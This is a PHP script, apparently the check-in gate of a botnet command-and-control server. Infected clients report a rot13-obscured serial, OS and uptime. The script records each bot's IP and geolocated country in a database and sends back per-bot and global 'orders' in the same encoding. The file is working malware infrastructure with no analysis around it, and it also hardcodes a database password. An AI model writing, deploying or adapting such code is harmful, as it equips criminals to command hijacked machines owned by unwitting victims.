<?PHP// file: info.phpinclude("geoip.inc"); // for the geoip function//

1. <?PHP
2. // file: info.php
3. include("geoip.inc"); // for the geoip function
4.  
5. // database connection information
6. $database = "test";
7. $user = "test";
8. $password = "zyuZtKnnzwKejQqw";
9. $host = "localhost";
10.  
11. // custom rot13
12. function customRot13($string)
13. {
14.     for($i=0; $i < strlen($string); $i++) {
15.         $c = ord($string[$i]);
16.        
17.         if ($c >= ord('n') & $c <= ord('z') | $c >= ord('N') & $c <= ord('Z'))
18.             $c -= 13;
19.         else if ($c >= ord('a') & $c <= ord('m') | $c >= ord('A') & $c <= ord('M'))
20.             $c += 13;
21.         else if ($c >= ord('0') & $c <= ord('4'))
22.             $c += 5;
23.         else if ($c >= ord('5') & $c <= ord('9'))
24.             $c -= 5;
25.            
26.             $string[$i] = chr($c);
27.     }
28.     return $string;
29. }
30.  
31. // data sanitization
32. function sanitize($data)
33. {
34.     // remove whitespaces (not a must though)
35.     $data = trim($data);
36.  
37.     // apply stripslashes if magic_quotes_gpc is enabled
38.     if(get_magic_quotes_gpc())
39.         $data = stripslashes($data);
40.            
41.     // a mySQL connection is required before using this function
42.     $data = mysql_real_escape_string($data);
43.  
44.     return $data;
45. }
46.    
47. if( isset($_GET['sid']) ) {
48.     // connect to the database
49.     $mysql = mysql_connect( $host, $user, $password );
50.     mysql_select_db( $database );
51.        
52.     // clear buffer in this format h6Yht56RfT:WIN7:50000:m1.0:7653332
53.     //                                  $serial:$os:$delay:$version:$uptime
54.        
55.     $buffer_crypted = sanitize($_GET['sid']);
56.     $buffer_clear = customRot13($buffer_crypted);
57.        
58.     $serial = strtok($buffer_clear, ":");
59.     $os = strtok(":");
60.     $delay = strtok(":");
61.     $version = strtok(":");
62.     $uptime = strtok(":");
63.        
64.     $lastorder_id = 0;
65.     $ip = getenv("REMOTE_ADDR");
66.        
67.     // sanitize ints
68.     $delay = intval($delay);
69.     $uptime = intval($uptime);
70.     $lastorder_id = intval($lastorder_id);
71.  
72.     // format uptime
73.     $minsuptime = $uptime % 60;
74.     if ( $minsuptime > 1 ) $minsuptime = $minsuptime." Minutes";
75.     else $minsuptime = $minsuptime." Minute";
76.        
77.     $hoursuptime = $uptime / 60 % 24;
78.     if ( $hoursuptime > 1 ) $hoursuptime = $hoursuptime." Hours";
79.     else $hoursuptime = $hoursuptime." Hour";
80.        
81.     $daysuptime = $uptime / 60 / 24 % 7;
82.     if ( $daysuptime > 1 ) $daysuptime = $daysuptime." Days";
83.     else $daysuptime = $daysuptime." Day";
84.        
85.     $weeksuptime = $uptime / 60 / 24 / 7 % 52;
86.     if ( $daysuptime > 1 ) $weeksuptime = $weeksuptime." Weeks";
87.     else $weeksuptime = $weeksuptime." Week";
88.        
89.     $uptimeformated = $weeksuptime.", ".$daysuptime.", ".$hoursuptime.", ".$minsuptime;
90.  
91.     // geolocate IP
92.     $gi = geoip_open("GeoIP.dat",GEOIP_STANDARD);
93.     $country_code = geoip_country_code_by_addr($gi, $ip);
94.     $country_name = geoip_country_name_by_addr($gi, $ip);
95.     geoip_close($gi);  
96.  
97.     // populate `clients` table
98.    
99.     // select our client's info
100.     $client_sql = "SELECT * FROM `clients` WHERE serial LIKE '$serial'";
101.     $client_result = mysql_query( $client_sql );
102.            
103.     // checks if the client is new
104.     if( !mysql_num_rows( $client_result ) ) {
105.         // we have a new client, insert info into the `clients` table
106.         $create_client_sql = "INSERT INTO `clients`
107.         (
108.         serial, os, ip, country_code, country_name, delay, version,
109.         uptime, lastorder_id, registered_time, report_time
110.         )
111.         VALUES
112.         (
113.         '$serial', '$os', '$ip', '$country_code', '$country_name', '$delay', '$version',
114.         '$uptimeformated', '$lastorder_id', NULL, NULL
115.         )";
116.            
117.         mysql_query( $create_client_sql ); // client added
118.     } else { // former client update information
119.         // get our client's row in the `clients` table
120.         $client_row = mysql_fetch_assoc( $client_result );
121.        
122.         // get the client's $client_id
123.         $client_id = $client_row['client_id'];
124.        
125.         // get the client's $lastorder_id
126.         $lastorder_id = $client_row['lastorder_id'];
127.        
128.         // calculate the online_uptime in secs
129.         if ( ( time() - strtotime($client_row['report_time']) ) < ( ( $client_row['delay'] / 1000 ) + 20 ) ) // if before delay expires
130.             $online_uptime = $client_row['online_uptime'] + time() - strtotime($client_row['report_time']); // new uptime
131.         else
132.             $online_uptime = $client_row['online_uptime']; // else welcome back here is what your uptime was!
133.            
134.         $tableinfo_sql = "SELECT create_time FROM INFORMATION_SCHEMA.TABLES WHERE table_name = clients";
135.         $tableinfo_result = mysql_query( $tableinfo_sql );
136.         $tableinfo_row = mysql_fetch_row( $tableinfo_result ); // stores `clients` table creation time
137.         $table_uptime = time() - strtotime($tableinfo_row[0]); // total uptime for the `clients` table
138.            
139.         $percent_uptime = ( 1 - ( ($table_uptime - $online_uptime) / $table_uptime ) ) * 100; // uptime in %
140.         $percent_uptime = intval($percent_uptime); // sanitize and make it an integer
141.        
142.         // uptate client information
143.         $update_sql = "UPDATE `clients` SET
144.                     report_time=NULL,
145.                     version='$version',
146.                     online_uptime='$online_uptime',
147.                     percent_uptime='$percent_uptime',
148.                     uptime='$uptimeformated',
149.                     delay='$delay',
150.                     ip='$ip',
151.                     country_code='$country_code',
152.                     country_name='$country_name',
153.                     lastorder_id='$lastorder_id'
154.                     WHERE serial LIKE '$serial'";          
155.         $update_result = mysql_query( $update_sql );
156.     } // done updating the client
157.        
158.     // get our client's row in the `clients` table
159.     $client_sql = "SELECT * FROM `clients` WHERE serial LIKE '$serial'";
160.     $client_result = mysql_query( $client_sql );
161.     $client_row = mysql_fetch_assoc( $client_result );
162.     // get the client's $client_id
163.     $client_id = $client_row['client_id'];
164.     // get the client's $lastorder_id
165.     $lastorder_id = $client_row['lastorder_id'];
166.        
167.     // check the `orders` table to see if there is a specific order for this client
168.     $orders_sql = "SELECT * FROM `orders` WHERE target_id LIKE '$client_id'";
169.     $orders_result = mysql_query( $orders_sql );
170.                
171.     // if there is a specific bot command prints it out
172.     if( mysql_num_rows( $orders_result ) ) {
173.         // echo the command to the client and clear it from the `orders` table
174.         echo ">".customRot13("init1")."<";
175.  
176.         while ( $orders_row = mysql_fetch_assoc( $orders_result ) ) {
177.             echo ">".customRot13($orders_row['order'])."<";
178.             $id = $orders_row['order_id'];
179.             $delete_sql = "DELETE FROM `orders` WHERE order_id LIKE '$id'";
180.             mysql_query( $delete_sql );
181.         } // done printing out all orders
182.     } // done with specific orders
183.    
184.     // check the `global_orders` table for orders
185.     $all_global_sql = "SELECT * FROM `global_orders`";
186.     $all_global_orders_result = mysql_query( $all_global_sql );
187.    
188.     if( mysql_num_rows( $all_global_orders_result ) ) { // there are global orders
189.         // check the `global_orders` table for orders
190.         $next_sql = "SELECT * FROM `global_orders` WHERE global_order_id > '$lastorder_id' ORDER BY global_order_id";
191.         $next_result = mysql_query( $next_sql );
192.         // check the `global_orders` table for orders matching
193.         if( mysql_num_rows( $next_result ) ) {
194.             // print out all the global orders it hasn't ran yet and update it's $lastorder_id
195.             echo ">".customRot13("init3")."<";
196.                
197.             while ( $next_row = mysql_fetch_assoc( $next_result ) ) {
198.                 // check if the command is expired             
199.                 if ( time() < strtotime($next_row['exp_time']) ) {
200.                     // echo the next global order for the client
201.                     echo ">".customRot13($next_row['global_order'])."<";
202.                     // client gets the global_order_id as it's $lastorder_id
203.                     $lastorder_id = $next_row['global_order_id'];
204.                     $next_order_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
205.                     mysql_query( $next_order_sql );
206.                 } else {
207.                     // command was old but gave it a shot here is your $lastorder_id
208.                     $lastorder_id = $next_row['global_order_id'];
209.                     $next_order_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
210.                     mysql_query( $next_order_sql );
211.                 } // done printing out the next global order   
212.             } // done printing out all global orders left to do
213.         } // no new global orders
214.     } // no global orders
215. } // no sid
216. ?>